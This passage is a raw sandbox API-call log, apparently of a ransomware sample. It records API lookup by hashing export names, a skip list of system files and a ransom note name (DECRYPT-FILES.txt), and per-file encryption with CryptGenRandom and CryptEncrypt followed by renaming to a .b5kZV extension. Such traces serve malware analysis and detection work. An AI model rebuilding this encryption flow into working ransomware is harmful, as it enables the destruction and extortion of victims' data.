lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.806] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.806] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.806] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.806] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.806] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.807] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.807] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.807] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.807] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.807] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.807] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.807] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.807] lstrlenA (lpString="DELETEATOM") returned 10 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.807] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.807] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.807] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.807] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.807] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.807] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.807] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.807] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.807] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.807] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.807] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.807] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.808] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.808] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.808] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.808] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.808] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.808] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.808] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.808] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.808] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.808] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.808] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.808] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.808] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.808] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.808] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.808] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.808] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.808] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.808] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.808] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.809] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.809] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.809] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.809] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.809] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.809] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.809] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.809] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.809] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.809] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.809] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.809] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv") returned 50 [0087.810] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv.b5kZV") returned 56 [0087.810] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tbojg0lig.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tBOJG0lIg.flv.b5kZV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tbojg0lig.flv.b5kzv"), dwFlags=0x0) returned 1 [0087.810] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.810] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.811] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.811] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e51f1f0, ftCreationTime.dwHighDateTime=0x1d4d45e, ftLastAccessTime.dwLowDateTime=0x1a8944e0, ftLastAccessTime.dwHighDateTime=0x1d4d0c7, ftLastWriteTime.dwLowDateTime=0x1a8944e0, ftLastWriteTime.dwHighDateTime=0x1d4d0c7, nFileSizeHigh=0x0, nFileSizeLow=0xb479, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TfA5dyz.avi", cAlternateFileName="")) returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="autorun.inf") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="boot.ini") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="desktop.ini") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="ntuser.dat") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="iconcache.db") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="bootsect.bak") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="ntuser.dat.log") returned 1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="thumbs.db") returned -1 [0087.811] lstrcmpiW (lpString1="TfA5dyz.avi", lpString2="Bootfont.bin") returned 1 [0087.811] lstrlenW (lpString="TfA5dyz.avi") returned 11 [0087.811] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.811] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.811] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.811] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.811] lstrlenW (lpString="TfA5dyz.avi") returned 11 [0087.811] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.811] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="TfA5dyz.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi" [0087.811] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tfa5dyz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.812] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=46201) returned 1 [0087.812] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.812] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.812] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.812] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.812] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.812] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.813] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.814] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.814] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.814] CloseHandle (hObject=0x414) returned 1 [0087.814] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.814] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.815] CloseHandle (hObject=0x0) returned 0 [0087.815] CloseHandle (hObject=0x410) returned 1 [0087.815] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.816] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.816] GetTickCount () returned 0x114e65a [0087.816] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.816] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.816] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.816] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.816] lstrlenA (lpString="kernel32.dll") returned 12 [0087.817] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.817] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.817] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.817] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.817] lstrlenA (lpString="ADDATOMA") returned 8 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.817] lstrlenA (lpString="ADDATOMW") returned 8 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.817] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.817] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.817] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.817] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.817] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.817] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.817] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.817] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.817] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.817] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.818] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.818] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.818] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.818] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.818] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.818] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.818] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.818] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.818] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.818] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.818] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.818] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.818] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.818] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.818] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.818] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.818] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.818] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.818] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.819] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.819] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.819] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.819] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.819] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.819] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.819] lstrcpyA (in: 